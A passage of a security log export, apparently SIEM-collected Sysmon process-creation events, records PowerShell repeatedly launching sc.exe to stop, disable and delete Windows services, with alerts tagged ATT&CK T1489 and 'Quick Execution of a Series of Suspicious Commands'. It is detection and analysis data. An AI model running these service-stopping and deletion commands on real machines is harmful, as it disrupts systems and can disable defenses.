12:49:35.517"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00101b8d1900}"",""processId"":""5448"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.469 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c28a1900} +ProcessId: 6300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.474004600Z"",""eventRecordID"":""2156"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.469\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c28a1900}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.469"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c28a1900}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.915",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.429 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001064881900} +ProcessId: 6588 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.431419000Z"",""eventRecordID"":""2153"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.429\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001064881900}\r\nProcessId: 6588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.429"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001064881900}"",""processId"":""6588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.901",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.416 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00109a871900} +ProcessId: 5960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.419591100Z"",""eventRecordID"":""2152"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.416\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00109a871900}\r\nProcessId: 5960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.416"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00109a871900}"",""processId"":""5960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.868",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.392 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001005861900} +ProcessId: 3308 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.394664500Z"",""eventRecordID"":""2150"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.392\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001005861900}\r\nProcessId: 3308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.392"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001005861900}"",""processId"":""3308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.821",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.342 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ac831900} +ProcessId: 3280 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.346070200Z"",""eventRecordID"":""2147"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.342\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ac831900}\r\nProcessId: 3280\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.342"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ac831900}"",""processId"":""3280"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.775",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.284 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7811900} +ProcessId: 4652 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.289901700Z"",""eventRecordID"":""2145"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.284\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7811900}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.284"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c7811900}"",""processId"":""4652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 